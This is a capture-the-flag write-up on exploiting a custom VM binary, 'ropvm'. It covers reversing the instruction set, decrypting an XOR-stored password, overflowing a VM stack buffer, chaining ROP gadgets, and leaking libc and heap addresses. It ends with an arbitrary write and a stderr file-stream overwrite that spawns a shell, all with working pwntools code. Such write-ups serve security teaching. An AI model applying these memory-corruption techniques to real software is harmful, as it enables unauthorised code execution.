
ropvm

We are provided with an ELF binary, ropvm, and a binary file program.bin (along with some misc setup files like Dockerfile and libc).

From the name of the challenge, we can infer that the ropvm binary is the interpreter for program.bin, which contains custom VM instructions.

Running the ropvm program prompts for a password, without which we are unable to proceed.

[INIT] VM Memory Initialized.
[RUN] Starting Virtual Machine...

== Welcome to the ROPVM ==
Password : shdjhsjds

[-] Wrong Password!

[EXIT] Program execution finished.

VM Reversing

Loading up ropvm in IDA, we find that the main function reads program.bin, performs some initialization, then calls sub_3A70 to start VM execution.

This is a perfect time to use an LLM, as they are excellent at understanding custom instruction set implementations (see Flareon 11).

Tossing sub_3A70 into Claude reveals some important facts about the VM:

  • Instructions are 16 bytes (4 32-bit little endian encoded integers):

    c
    struct Instruction {
        uint32_t opcode;    // Operation code
        uint32_t reg1;      // First register/operand
        uint32_t reg2;      // Second register/operand  
        uint32_t reg3;      // Third register/operand or immediate value
    };
  • The instruction set is very similar to Intel x86. [Image: opcode table]

  • 3 syscalls are implemented, selected by the value of register 0: read (0), printf (1) and exit (3).

  • The VM is stack based, but uses registers as well.

Next, we can ask Claude to generate a Python disassembler for the program.bin file.

This worked surprisingly well: the generated disassembler decoded all the instructions correctly.
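To give a rough idea of what such a disassembler boils down to, here is a minimal sketch. It only names opcodes 21 (SYSCALL) and 22 (LOADI), since those are the two whose numbers are confirmed later in this writeup; every other opcode is printed as a raw number. The function name `disassemble` and the output format are my own choices for illustration, not necessarily what Claude generated.

```python
import struct

# Opcodes confirmed elsewhere in this writeup; all others are left unnamed.
KNOWN_OPCODES = {21: "SYSCALL", 22: "LOADI"}

def disassemble(code: bytes, base: int = 0):
    """Yield (address, text) for each complete 16-byte instruction in `code`."""
    for off in range(0, len(code) - len(code) % 16, 16):
        # Four little-endian 32-bit fields: opcode and three operands
        opcode, a, b, c = struct.unpack_from("<4I", code, off)
        name = KNOWN_OPCODES.get(opcode, f"OP_{opcode}")
        if name == "LOADI":
            text = f"LOADI 0x{a:04X}, {b}"
        elif name == "SYSCALL":
            text = "SYSCALL"
        else:
            text = f"{name} 0x{a:X}, 0x{b:X}, 0x{c:X}"
        yield base + off, text

# Two hand-assembled instructions standing in for a slice of program.bin
sample = struct.pack("<4I", 22, 0, 1, 0) + struct.pack("<4I", 21, 0, 0, 0)
for addr, text in disassemble(sample, base=0x120):
    print(f"{addr:04X}: {text}")
```

Running it over the whole of program.bin would only require replacing `sample` with the file contents and filling in the remaining opcode names.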

Here's part of the disassembly of program.bin (I've renamed some labels):

asm
0010: CALL print_msg                  
0020: CALL print_msg2                  
0030: CALL read_input                  
0040: CALL check_password                  
0050: CALL exit                  
0060: HALT                           

print_msg:
0100: PUSH 0x000D                    
0110: MOV 0x000D, 0x000E             
0120: LOADI 0x0000, 1                
0130: LOADI 0x0001, 32768            
0140: LOADI 0x0002, 32784            
0150: SYSCALL                        
0160: MOV 0x000E, 0x000D             
0170: POP 0x000D                     
0180: RET

The print_msg function is responsible for printing the welcome message. The welcome string is located at memory offset 32784, and syscall 1 (printf) is used to print the message.

You might also notice that

asm
0100: PUSH 0x000D                    
0110: MOV 0x000D, 0x000E     
...
0160: MOV 0x000E, 0x000D             
0170: POP 0x000D

resembles the function prologue and epilogue that we are familiar with in x86.

Indeed, the registers 0xd and 0xe take on the roles of ebp and esp respectively (and I have renamed them as such from here onward). This will be important when we attempt to exploit the VM later.

Flag checker

Just after the print_msg function is the read_input function:

asm
read_input:
0200: push ebp                    
0210: MOV ebp, esp           
0220: LOADI 0x0000, 0                
0230: LOADI 0x0001, 61440            
0240: LOADI 0x0002, 64               
0250: SYSCALL                        
0260: MOV esp, ebp             
0270: POP ebp                     
0280: RET

64 bytes of input are read to memory offset 61440.

check_password at offset 0x1300 is the function that is responsible for validating the input:

asm
check_password:
1300: push ebp                    
1310: MOV ebp, esp           
1320: LOADI 0x0003, 0                
1330: LOADI 0x0004, 16               
1340: LOADI 0x0007, 61440            
1350: LOADI 0x0008, 33024            
1360: LOADI 0x000B, 7                
1370: LOADI 0x000C, 66               

loc_1380:
1380: ADD 0x0000, 0x0007, 0x0003     
1390: LOADR 0x0005, 0x0000           
13A0: ADD 0x0001, 0x0008, 0x0003     
13B0: LOADR 0x0006, 0x0001           
13C0: MUL 0x000A, 0x0003, 0x000B     
13D0: ADD 0x000A, 0x000A, 0x000C     
13E0: AND 0x0005, 0x0005, 0xFF       
13F0: AND 0x0006, 0x0006, 0xFF       
1400: XOR 0x0005, 0x0005, 0x000A     
1410: EQ 0x0000, 0x0005, 0x0006      
1420: JNE 0x0005, 0x0006, die   
1430: INC 0x0003                     
1440: JLT 0x0003, 0x0004, loc_1380   
1450: CALL print_correct                  
1460: CALL pwn                  
1470: CALL sub_0300                  
1480: JMP loc_14A0

This is yet another great opportunity to use Claude to help us understand all that assembly! I asked it to translate the check_password function to Python:

python
def check_password(memory):
    # Memory regions
    region1_base = 0xF000  # 61440
    region2_base = 0x8100  # 33024
    
    # Check 16 bytes
    for i in range(16):
        # Get bytes from both regions
        byte1 = memory[region1_base + i] & 0xFF
        byte2 = memory[region2_base + i] & 0xFF
        
        # Calculate XOR key: i * 7 + 66
        xor_key = ((i * 7) + 66) & 0xFF
        
        # Apply XOR to first byte and compare
        if (byte1 ^ xor_key) != byte2:
            return False
    
    return True

The password is stored at offset 0x8100, encrypted using a simple XOR algorithm. We can write a one-liner Python script to extract and decrypt the password:

python
>>> bytes((((i*7)+66)&0xff) ^ x for i,x in enumerate(open("./program.bin", "rb").read()[0x8100:][:16]))
b'V3ry53cretP4ass\n'

Entering V3ry53cretP4ass as the password prints the Correct Password! message.
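As a sanity check, the scheme can also be run in the forward direction. The sketch below re-encrypts the recovered password with the same key schedule (i * 7 + 66) and decrypts it again. The helper names are hypothetical, and the ciphertext here is computed locally rather than read from program.bin.

```python
def key(i: int) -> int:
    # Per-byte XOR key used by check_password: i * 7 + 66, truncated to a byte
    return (i * 7 + 66) & 0xFF

def xor_password(data: bytes) -> bytes:
    # XOR is its own inverse, so the same function encrypts and decrypts
    return bytes(b ^ key(i) for i, b in enumerate(data))

password = b"V3ry53cretP4ass\n"   # 15 characters plus the newline read from stdin
stored = xor_password(password)    # what the 16 bytes at 0x8100 should look like
assert xor_password(stored) == password
print(stored.hex())
```

Note that the trailing newline is part of the 16 compared bytes, which is why the password has to be submitted with a newline directly after it.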

But the program doesn't immediately exit. Instead, we are prompted for a second input, which is then echoed back.

[INIT] VM Memory Initialized.
[RUN] Starting Virtual Machine...

== Welcome to the ROPVM ==
Password : V3ry53cretP4ass

[+] Correct Password!
Hello!
Hello!

[EXIT] Program execution finished.

Buffer overflow

The pwn function is responsible for the behavior observed above. It is called in check_password after printing the success message.

asm
pwn:
0A00: push ebp                    
0A10: MOV ebp, esp           
0A20: LOADI 0x0000, 32               
0A30: SUB esp, esp, 0x0000     
0A40: LOADI 0x0000, 0                
0A50: MOV 0x0001, esp             
0A60: LOADI 0x0002, 256              
0A70: SYSCALL                        
0A80: MOV 0x0000, esp             
0A90: MOV esp, ebp             
0AA0: POP ebp                     
0AB0: RET

This function subtracts 32 from esp, essentially allocating 32 bytes on the stack. However, 256 bytes are then read into this newly allocated stack memory, causing a buffer overflow.
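The distance to the saved return address follows from the prologue: 32 bytes of buffer, then the slot written by push ebp, then the return address. Here is a small sketch of that layout, assuming 4-byte stack slots (consistent with the p32 values used in the exploit later on). `overflow` is a hypothetical helper, not part of the original exploit.

```python
import struct

BUF_SIZE = 32    # SUB esp, esp, 32 in pwn
SAVED_EBP = 4    # slot written by the prologue's push ebp

def overflow(ret_addr: int, fill: bytes = b"A") -> bytes:
    # Fill the buffer and the saved ebp, then place the new return address
    return fill * (BUF_SIZE + SAVED_EBP) + struct.pack("<I", ret_addr)

payload = overflow(0x41414141)
print(len(payload), payload[-4:])
```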

Indeed, if we send in more than 32 bytes of input, we can cause a "segfault":

[INIT] VM Memory Initialized.
[RUN] Starting Virtual Machine...

== Welcome to the ROPVM ==
Password : V3ry53cretP4ass

[+] Correct Password!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[ERROR] Access violation : 0x41414141terminate called after throwing an instance of 'std::out_of_range'
  what():  [SEGFAULT]

Unfortunately for us, this "segfault" happens inside the VM and is detected by ropvm itself, rather than being a crash of the host process:

c
v3 = vm->instruction_pointer;
instruction_pointer = *v3;
if ( (unsigned int)*v3 > 0x7FFF )
{
LABEL_9:
    __printf_chk(1, "[ERROR] Access violation : %#x", instruction_pointer);
    exception = (std::out_of_range *)__cxa_allocate_exception(0x10u);
    std::out_of_range::out_of_range(exception, "[SEGFAULT]");
    __cxa_throw(
      exception,
      (struct type_info *)&`typeinfo for'std::out_of_range,
      (void (*)(void *))&std::out_of_range::~out_of_range);
}

It will require more work before we can escape the ropvm.

Ropping the VM

The first objective of the exploit will be to achieve arbitrary code execution within the ropvm. This will allow us to more easily run the instructions required to escape from the VM.

To do this, we will perform a read syscall to write to the instruction memory section of the VM memory (addresses up to 0x7fff, as enforced by the check above), then jump to that memory location. We will thus require control over registers 0, 1 and 2.

Luckily for us, POP N gadgets are readily available:

asm
0400: push ebp                    
0410: MOV ebp, esp           
0420: POP 0x0000                     
0430: MOV esp, ebp             
0440: POP ebp                     
0450: RET

Unfortunately, they aren't as clean as the pop rdi; ret; found in x86_64. If we simply jumped to 0x400, the value of ebp would be popped into register 0, which is definitely not desirable. Instead, we will jump to 0x420, but we will still need to deal with the effects of MOV esp, ebp and POP ebp.

Using gdb, I found that the address of the saved return address was 0xdff4.

Now that we know the base address of the stack, we can use the pop ebp; ret gadget to adjust the stack before each pop gadget, so that the effects of MOV esp, ebp and POP ebp are negated, and esp points to the correct location on the stack when ret is executed.

python

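from pwn import *  # provides p32; `p` is the tube connected to ropvm

# Gadget addresses inside program.bin
pop_0 = 0x420        # POP r0; MOV esp, ebp; POP ebp; RET
pop_1 = 0x520        # POP r1; MOV esp, ebp; POP ebp; RET
pop_rbp = 0x370      # POP ebp; RET
large_read = 0x1040  # LOADI r2, 32816; SYSCALL; MOV esp, ebp; POP ebp; RET

stack_start = 0xdff4  # address of the saved return address in pwn
p.sendline(b"V3ry53cretP4ass")
pl = b""
# r0 = 0 (read syscall)
pl += p32(pop_rbp)
pl += p32(stack_start + 4*3)
pl += p32(pop_0)
pl += p32(0)
# r1 = 0x100 (destination inside instruction memory)
pl += p32(pop_rbp)
pl += p32(stack_start + 4*3+4*4)
pl += p32(pop_1)
pl += p32(0x100)
# r2 = 32816, perform the read, then return to 0x100
pl += p32(pop_rbp)
pl += p32(stack_start + 4*3+4*4+4*3)
pl += p32(large_read)
pl += p32(0x100)
p.recvuntil(b"!\n")
# 32 bytes of buffer + 4 bytes of saved ebp, then the chain
p.sendline(b"A"*36+pl)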

For example, after the pop 0 gadget, we want esp to point to stack_start + 4 * 4, so we set ebp to stack_start + 4 * 3 (the pop ebp instruction will do one final increment).
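The ebp bookkeeping is easy to get wrong, so it helps to trace the chain by hand or with a toy model. The sketch below simulates only the four gadgets used in the chain (it is not the real interpreter, and the SYSCALL inside the 0x1040 gadget is not modelled) and checks that execution ends up at 0x100 with registers 0 and 1 set as intended. The function `run` and the dictionary-based stack are assumptions made for illustration.

```python
STACK_START = 0xDFF4  # address of pwn's saved return address (found with gdb)
POP_EBP, POP_0, POP_1, LARGE_READ = 0x370, 0x420, 0x520, 0x1040

chain = [
    POP_EBP, STACK_START + 12, POP_0, 0,
    POP_EBP, STACK_START + 28, POP_1, 0x100,
    POP_EBP, STACK_START + 40, LARGE_READ, 0x100,
]
# Each chain entry occupies one 4-byte stack slot
stack = {STACK_START + 4 * i: v for i, v in enumerate(chain)}

def run(stack, esp):
    regs = {"r0": None, "r1": None, "ebp": None}
    trace = []

    def pop():
        nonlocal esp
        value = stack[esp]
        esp += 4
        return value

    ip = pop()  # the RET at the end of pwn
    while ip in (POP_EBP, POP_0, POP_1, LARGE_READ):
        trace.append(ip)
        if ip == POP_0:
            regs["r0"] = pop()
        elif ip == POP_1:
            regs["r1"] = pop()
        if ip != POP_EBP:
            esp = regs["ebp"]   # MOV esp, ebp
        regs["ebp"] = pop()     # POP ebp
        ip = pop()              # RET
    return regs, trace, ip

regs, trace, final_ip = run(stack, STACK_START)
print([hex(g) for g in trace], hex(final_ip), regs["r0"], hex(regs["r1"]))
```

If any of the three ebp values is off by one slot, the model either raises a KeyError or returns to the wrong address, which mirrors what happens in the real VM.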

Luckily for us, there is a LOADI 0x0002, 32816; SYSCALL gadget at 0x1040. This eliminates the need to manually set register 2 (number of bytes to read), as any large value is sufficient.

asm
1040: LOADI 0x0002, 32816            
1050: SYSCALL                        
1060: MOV esp, ebp             
1070: POP ebp                     
1080: RET

Using this ROP chain, we write our secondary shellcode payload to 0x100, then jump to it. Before discussing the shellcode payload, let us first understand the internal implementation of the ropvm.

Implementation details

I used hrtng (and some manual editing and analysis of sub_3690) to recover the struct for the ropvm interpreter:

c
struct vm
{
  char *memory;
  char *memend;
  char *memcap;
  __int64 (*registers)[16];
  void *regend;
  void *regcap;
  unsigned __int64 *reg_ptr[9];
  __int64 *instruction_pointer;
  unsigned __int64 *esp;
  unsigned __int64 *ebp;
};

The memory and registers are implemented as C++ vectors and stored on the (real) heap. This will soon become important.

Another (also important) oddity is the fact that the register array contains 16 64-bit values. However, only the lower 32 bits can be set using the loadi and pop instructions.

Next, let's have a look at the implementation of the read and printf syscalls:

c
 case 21:
  registers_1 = (__int64 *)vm->registers;
  n3 = *registers_1;
  if ( *registers_1 )
  {
    if ( n3 == 1 )
    {
      __printf_chk(1, &memory[registers_1[1]], &memory[registers_1[2]]);
      instruction_pointer_1 = vm->instruction_pointer;
    }
    else if ( n3 == 3 )
    {
      std::__ostream_insert<char,std::char_traits<char>>(std::cout, "\n[EXIT] Program execution finished.", 35);
      // ...
      exit(0);
    }
  }
  else
  {
    read(0, &memory[registers_1[1]], *((int *)registers_1 + 4));
    instruction_pointer_1 = vm->instruction_pointer;
  }
  instruction_pointer = *instruction_pointer_1 + 16;
  *instruction_pointer_1 = instruction_pointer;
  break;

As expected, the value of register 0 is read to determine the syscall to execute. However, in the read syscall, the value of registers_1[1] is used directly to index memory. There is no type casting or bit manipulation to ensure that only the lower 32 bits of register 1 are used. Additionally, there are also no checks to ensure that only ropvm memory is accessed.

Thus, if we can control the full 64 bits of register 1, we can effectively write to any address within the program's memory, potentially overwriting important structures in libc.
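In other words, to make &memory[index] land on a chosen target, register 1 has to hold the target address minus the base of vm->memory, taken modulo 2^64. A minimal sketch of that arithmetic follows. The two addresses are made-up placeholders, not values from the challenge, and `index_for` is a hypothetical helper.

```python
MASK64 = (1 << 64) - 1

def index_for(target: int, memory_base: int) -> int:
    # &memory[index] == target when index = target - memory_base (mod 2**64)
    return (target - memory_base) & MASK64

# Made-up example addresses, for illustration only
memory_base = 0x5555_5556_B2C0
target = 0x7FFF_F7E1_B6A0

idx = index_for(target, memory_base)
assert (memory_base + idx) & MASK64 == target
print(hex(idx))
```

Targets below vm->memory work the same way: the index simply wraps around to a large 64-bit value.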

Since both vm->memory and vm->registers are allocated in the heap, they are located at a constant, predictable and small offset from each other, as can be seen in gdb:

[Screenshot: gdb output showing the heap addresses of vm->memory and vm->registers]

They are only 0x90 bytes apart!

By leveraging our control over the lower 32 bits of register 1, we can perform a read syscall to write to vm->registers, controlling the full 64 bits of all registers. We can then use another read syscall to achieve arbitrary write.
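The effect can be illustrated with a toy model of the heap. It assumes that the register array sits 0x90 bytes before the VM memory, which is what the -0x90 index used in the shellcode later implies. The bytearray, the position of the registers inside it and the helper names are invented for illustration. Only the 0x90 distance and the 64-bit register width come from the analysis above.

```python
import struct

REGS_OFF = 0x10              # hypothetical position of vm->registers in the toy heap
MEM_OFF = REGS_OFF + 0x90    # vm->memory, 0x90 bytes after the registers
heap = bytearray(MEM_OFF + 0x100)

def vm_read(reg1: int, data: bytes) -> None:
    # Models read(0, &memory[reg1], n): reg1 is used as an unchecked index
    start = MEM_OFF + reg1
    heap[start:start + len(data)] = data

def register(n: int) -> int:
    # Registers are stored as 64-bit little-endian values
    return struct.unpack_from("<Q", heap, REGS_OFF + 8 * n)[0]

# Index -0x90 lands exactly on register 0, so the input bytes become r0, r1, r2.
# The value written to r1 is a placeholder 64-bit offset.
vm_read(-0x90, struct.pack("<3Q", 0, 0x7FFF_DEAD_BEEF, 0x1000))
print(hex(register(1)))
```

After this write, register 1 holds a value that could never have been loaded 32 bits at a time, and register 0 is already set up for the next read syscall.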

Leaks

Before we exploit the arbitrary write, we will need to determine the correct offset between vm->memory and our target. Luckily for us, vm->memory is located in the heap, which is full of pointers to both the heap and libc.

Using vmmap and search-pattern in gdb, I found a suitable libc leak at offset 0x101e0 and a heap leak at offset 0x10098:

[Screenshot: gdb vmmap and search-pattern output showing the libc and heap leaks]

It is crucial that offsets are calculated on the ropvm running in the provided docker container, as the offsets may vary between different libc versions. Debugging processes running in docker can be simplified using docker-dbg:

python
p, dp = docker_debug("/home/user/ropvm", "ropvm")
dp.brpt(0x3aa0)
p.interactive()

Shellcoding the VM

Now that we've got our leaks and arbitrary write, all that's left is to write some ropvm shellcode that implements our exploit.

Luckily, two instructions are sufficient:

python
def loadi(r, val):
    return p32(22)+p32(r)+p32(val)+p32(0)

def syscall():
    return p32(21)+p32(0)*3
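For reference, the same encoding can be reproduced with only the standard library. This sketch is an equivalent written with struct rather than the helpers actually used in the exploit; `encode` is a hypothetical name. The one subtlety is that struct refuses negative values for unsigned fields, so immediates such as -0x90 have to be masked to 32 bits explicitly.

```python
import struct

def encode(opcode: int, a: int = 0, b: int = 0, c: int = 0) -> bytes:
    # Four little-endian 32-bit fields; mask so negative immediates wrap
    return struct.pack("<4I", *(x & 0xFFFFFFFF for x in (opcode, a, b, c)))

def loadi(reg: int, value: int) -> bytes:
    return encode(22, reg, value)

def syscall() -> bytes:
    return encode(21)

print(loadi(1, -0x90).hex())
print(syscall().hex())
```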

Here's the shellcode:

python
pl2 = b""
# Leak libc
pl2 += loadi(0, 0x1)
pl2 += loadi(1, 0x101e0)
pl2 += syscall()
# Leak heap
pl2 += loadi(1, 0x10098)
pl2 += syscall()
# read(0, vm->registers, 0x20)
pl2 += loadi(0, 0x0)
pl2 += loadi(1, -0x90)
pl2 += loadi(2, 0x20)
pl2 += syscall()
# Perform arbitrary write
pl2 += syscall()
# Exit
pl2 += loadi(0, 0x3)
pl2 += syscall()
pause()
p.sendline(pl2)

The target of our arbitrary write is the well-known stderr file stream struct. By overwriting the pointers within this struct, we can execute system("sh") when the process exits and the file streams are flushed.

The exploit proceeds very similarly to any other libc leak + arbitrary write exploit:

python
leak1 = u64(p.recv(6)+b"\0\0")
libc.address = leak1 - 0x1ef0c0 - 0x28000
print(hex(libc.address))
heap_base = u64(p.recv(6)+b"\0\0") - 0x100f0
print(hex(heap_base))
p.clean()
pause()
stderr_addr = libc.sym._IO_2_1_stderr_
# here we setup the ropvm registers for the arbitrary write
pl3 = p64(0)+p64(stderr_addr - heap_base)+p64(0x1000)
p.sendline(pl3)

fs = FileStructure()
# u64 expects bytes: two spaces followed by "sh" padded to 8 bytes
fs.flags = u64(b"  " + b"sh".ljust(6, b"\x00"))
fs._IO_write_base = 0
fs._IO_write_ptr = 1
fs._lock = stderr_addr-0x10 # Should be null
fs.chain = libc.sym.system
fs._codecvt = stderr_addr
# stderr becomes its own wide data vtable
# Offset is so that system (fs.chain) is called
fs._wide_data = stderr_addr - 0x48
fs.vtable = libc.sym._IO_wfile_jumps
fsb = bytes(fs)
p.sendline(fsb)

And we finally get a shell:

[Screenshot: shell obtained from the exploit]

Appendix

program.asm
asm
0010: CALL print_msg                  
0020: CALL print_msg2                  
0030: CALL read_input                  
0040: CALL check_password                  
0050: CALL exit                  
0060: HALT                           

print_msg:
0100: push ebp                    
0110: MOV ebp, esp           
0120: LOADI 0x0000, 1                
0130: LOADI 0x0001, 32768            
0140: LOADI 0x0002, 32784            
0150: SYSCALL                        
0160: MOV esp, ebp             
0170: POP ebp                     
0180: RET                            

read_input:
0200: push ebp                    
0210: MOV ebp, esp           
0220: LOADI 0x0000, 0                
0230: LOADI 0x0001, 61440            
0240: LOADI 0x0002, 64               
0250: SYSCALL                        
0260: MOV esp, ebp             
0270: POP ebp                     
0280: RET                            

sub_0300:
0300: push ebp                    
0310: MOV ebp, esp           
0320: MOV 0x0002, 0x0000             
0330: LOADI 0x0000, 1                
0340: LOADI 0x0001, 32768            
0350: SYSCALL                        
0360: MOV esp, ebp             
0370: POP ebp                     
0380: RET                            



0400: push ebp                    
0410: MOV ebp, esp           
0420: POP 0x0000                     
0430: MOV esp, ebp             
0440: POP ebp                     
0450: RET                            



0500: push ebp                    
0510: MOV ebp, esp           
0520: POP 0x0001                     
0530: MOV esp, ebp             
0540: POP ebp                     
0550: RET                            



0600: push ebp                    
0610: MOV ebp, esp           
0620: POP 0x0002                     
0630: MOV esp, ebp             
0640: POP ebp                     
0650: RET                            



0700: push ebp                    
0710: MOV ebp, esp           
0720: MUL 0x0001, 0x0000, 0x0001     
0730: MOV esp, ebp             
0740: POP ebp                     
0750: RET                            


0800: push ebp                    
0810: MOV ebp, esp           
0820: LOAD 0x0000, 0x8050            
0830: STORE 0x0000, 0x8054           
0840: MOV esp, ebp             
0850: POP ebp                     
0860: RET                            

exit:
0900: push ebp                    
0910: MOV ebp, esp           
0920: LOADI 0x0000, 3                
0930: SYSCALL                        
0940: MOV esp, ebp             
0950: POP ebp                     
0960: RET                            

pwn:
0A00: push ebp                    
0A10: MOV ebp, esp           
0A20: LOADI 0x0000, 32               
0A30: SUB esp, esp, 0x0000     
0A40: LOADI 0x0000, 0                
0A50: MOV 0x0001, esp             
0A60: LOADI 0x0002, 256              
0A70: SYSCALL                        
0A80: MOV 0x0000, esp             
0A90: MOV esp, ebp             
0AA0: POP ebp                     
0AB0: RET                            
0C00: push ebp                    
0C10: MOV ebp, esp           
0C20: POP esp                     
0C30: RET                            

print_msg2:
1000: push ebp                    
1010: MOV ebp, esp           
1020: LOADI 0x0000, 1                
1030: LOADI 0x0001, 32768            
1040: LOADI 0x0002, 32816            
1050: SYSCALL                        
1060: MOV esp, ebp             
1070: POP ebp                     
1080: RET                            

print_correct:
1100: push ebp                    
1110: MOV ebp, esp           
1120: LOADI 0x0000, 1                
1130: LOADI 0x0001, 32768            
1140: LOADI 0x0002, 32880            
1150: SYSCALL                        
1160: MOV esp, ebp             
1170: POP ebp                     
1180: RET                            

print_die:
1200: push ebp                    
1210: MOV ebp, esp           
1220: LOADI 0x0000, 1                
1230: LOADI 0x0001, 32768            
1240: LOADI 0x0002, 32848            
1250: SYSCALL                        
1260: MOV esp, ebp             
1270: POP ebp                     
1280: RET                            

check_password:
1300: push ebp                    
1310: MOV ebp, esp           
1320: LOADI 0x0003, 0                
1330: LOADI 0x0004, 16               
1340: LOADI 0x0007, 61440            
1350: LOADI 0x0008, 33024            
1360: LOADI 0x000B, 7                
1370: LOADI 0x000C, 66               

loc_1380:
1380: ADD 0x0000, 0x0007, 0x0003     
1390: LOADR 0x0005, 0x0000           
13A0: ADD 0x0001, 0x0008, 0x0003     
13B0: LOADR 0x0006, 0x0001           
13C0: MUL 0x000A, 0x0003, 0x000B     
13D0: ADD 0x000A, 0x000A, 0x000C     
13E0: AND 0x0005, 0x0005, 0xFF       
13F0: AND 0x0006, 0x0006, 0xFF       
1400: XOR 0x0005, 0x0005, 0x000A     
1410: EQ 0x0000, 0x0005, 0x0006      
1420: JNE 0x0005, 0x0006, die   
1430: INC 0x0003                     
1440: JLT 0x0003, 0x0004, loc_1380   
1450: CALL print_correct                  
1460: CALL pwn                  
1470: CALL sub_0300                  
1480: JMP loc_14A0                   

die:
1490: CALL print_die                  

loc_14A0:
14A0: MOV esp, ebp             
14B0: POP ebp                     
14C0: RET